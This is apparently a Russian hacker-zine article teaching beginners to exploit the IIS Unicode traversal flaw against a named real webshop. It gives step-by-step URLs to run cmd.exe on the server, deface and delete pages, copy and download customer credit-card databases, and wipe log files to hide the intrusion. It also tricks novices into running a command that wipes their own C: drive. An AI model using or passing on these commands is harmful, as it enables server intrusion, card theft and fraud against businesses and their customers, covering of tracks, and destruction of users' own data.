Сразу говорю что вся инфа для ознакомительных целей !!! Тут не просто пример, а настоящая дыра которая еще работает!!! То есть я проверял дыру перед отправкой этой инфы 2 февраля в 4:15 она работала !!! Поторопитесь!

Ты уже научился нюкать своих врагов? И даже можешь определить айпи своего врага в чате ? Но ты все еще не знаешь как хакеры получают кредитки ? Ок значит эта статья для тебя !

Ты конечно же знаешь, что помимо виндов 98 существуют такие операционки как Linux, Unix, WindowsNT. Вот о последней речь и пойдет Эта замечательная операционка в сочетании с сервером ISS 4.0 /5.0 имеет UNICODE уязвимость Что эта за уязвимость я напишу в следующий раз да и писали уже про это. Наша задача научиться правильно воспользоваться данной дырой чтобы поиметь кред ! Данная уязвимость позволяет получить командную строку. Что это значит ? Ты че в досе не лазил никогда что ли ! Ну ?! Знаешь в досе пишеться c: вот это и есть командная строка, если ты еще не хакер то обязательно напиши себе в командную строку deltree c:/ y после чего нажми на ENTER и ты станешь хакером! Извините, отошел от темы ну вот кто такое у себя напишет и на ENTER нажмет тот крутой хакер ! Ну надеюсь мы разобрались что такое командная строка. Те кто тока что хакерами стали ощутили мощь командной строки на своем бедном винте. Ну вот, эта UNICODE уязвимость позволяет получить нам командную строку на сервере. Давайте рассмотрим эту уязвимость на примере сервера http://www.kaypro.com/. Да да это крутой webshop в котором в день по 100-900 покупок делают. А админы этого сервера даже не подозревают что в их сервере дыра ! Ну хацкер смотри на нее и любуйся

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+dir+c:

После того как ты это наберешь и нажмешь ENTER твоему обзору предстанет полный список файлов и директорий диска с: этого сервера ! Ну если ты умный ламмер то ты поймешь почему я тут про дос базарил! А для начинающих хацкеров скажу видите в самом конце адреса написано dir+c: Сразу объясняю + это пробел !!! Ну догадались ну конечно же если набрать в досе dir c: и нажать ENTER на экран выльется все содержимое диска с !! Ну сейчас нам не каталоги разглядывать хочется, а кред поиметь тем более что мы знаем что это webshop. И так ищем каталог wwwroot. Да весь диск c: облазили, а такого каталога найти не смогли, но не отчаивайся уважаемый ламмер, сейчас я тебя научу искать этот каталог. В данной ситуации, на ISS то биш, он практически всегда находиться в каталоге INETPUB Да знаю я что нет такого каталога на диске c:! Поэтому предлагаю вам пройти чуточку вперед. Вперед это куда спросите вы? Ну разумеется на диск D:, кудаж еще !
Ну вот видите я же говорил что есть такой каталог просто он на этом серваке на диске d находиться. Для особо умных показываю как перейти на диск d:

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+dir+d:

Теперь нам надо зайти в этот каталог (inetpub) это делается просто! Припишите в конец адреса у вас в браузуре /inetpub Только слеш в конце не ставьте выглядит это вот как 

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+dir+d:inetpub

У тех кто хорошо знает дос вообще проблем не будет! Вот мы видим каталог wwwroot в этом каталоге находятся файлы для публикации в интернете. Ну зайди на http://www.kaypro.com и увидиш ! 
Вот мы вошли в wwwroot адрес у нас выгладит так 

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/ c+dir+d: inetpubwwwroot

Теперь надо сказать админам, что мы хакеры и что мы разгромили их страничку - это просто ! Берем копируем наш файлик cmd.exe в каталог /msadc/. Как это сделать? Просто вот вам команда!

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/ c+copy+c:winnt system32cmd.exe+c:progra~1 common~1 systemmsadccmd1.exe

Что нам это дало ? Ну во первых теперь юзать дырку мы будем через короткий адрес а точнее 
http://www.kaypro.com/msadc/cmd1.exe?/c+dir+d:

Согласитесь так удобней ! Вот теперь мы можем расписать страничку этих ламмов ! А делается это так !

http://www.kaypro.com/msadc/cmd1.exe?/ c+@echo Здесь был хакер Володя !!! > d:inetpubwwwrootindex.htm

Теперь при входе на www.kaypro.com мы увидим надпись Здесь был хакер Володя в самом низу странички ! 
Но это еще не самое прикольное можно убить эту страничку то, есть кто знает что за html команда <plaintext> тот знает как прикольнуться ! Ну а для особо жестоких можно вообще удалить эту страничку index.htm, тогда при входе на www.kaypro.com мы будем видеть содержание каталога d:inetpubwwwroot Как это делать ? Просто! http://www.kaypro.com/msadc/cmd1.exe?/ c+del+d:inetpubwwwrootindex.htm 

После запуска такого адреса страничка index.htm сотрется. Впрочем мона так стереть все что захочеться у них на дисках !!! 

Я вас подготавливал к самому главному теперь нам надо поиметь креды с их дисков!!!! Креды находятся в  d:inetpubwwwrootdatabases я это узнал за вас ! Набираем вот такой адрес 

http://www.kaypro.com/msadc/cmd1.exe? /c+dir+d: inetpubwwwrootdatabases

Ну и зачем мы сюда пришли спросите вы? И че это за файлы с расширением *.mdb??? Уважаемые если вы дочитали до этого момента мою статью значит сейчас вы поимеете кред !!! В этих файлах кред столько, что на пол России хватит! Особено в той базе что на 250 метров - она просто забита кредами !!!! Но самая хорошая база это kaypro.mdb, в ней самые крутые креды! Ну Ну давай говори как их поиметь !!!! Ну куда вы так торопитесь, все по порядку!!! Как вы поняли эти базы отсюда скачать невозможно. Ну че ты так расстроился ламмер ? Какие проблемы нам надо всего лиш скопировать любую базу из этого каталога в наш каталог /msadc/, это совсем просто. Помнишь как мы скопировали сюда (а мы находимся в каталоге /msadc/ это из него мы просматриваем все) файл cmd1.exe. Теперь нам надо скопировать базу вот как мы это делаем 

http://www.kaypro.com/msadc/cmd.exe1?/ c+copy+d:inetpub databases kaypro.mdb+c:progra~1 common~1systemmsadckaypro.mdb

Вот и все уважаемые база ваша !!! Теперь качаем ее. Для ламеров показываю как это сделать !

http://www.kaypro.com/msadc/kaypro.mdb

После того как мы наберем такой адрес база начнет качаться !!!

Ну вот, пока качается база заходим на http://www.hackarea.net смотрим что там есть !!!! Посмотрели? Теперь вы можете поприкалываться над серваком, постирать там ченить,  похакать в конце концов! Итак выкачали мы базу - теперь заметем следы ну а как это сделать любой ламмер знает!!! А для начинающих говорю стирайте все файлы с расширением *.log и все !

Вот вам настоящий рабочий пример ! Я думаю что если такой инфы на хакере будет больше то будет круто!!! Всего хорошего начинающие хакеры ! Теперь я могу вас так называть...

Автор: New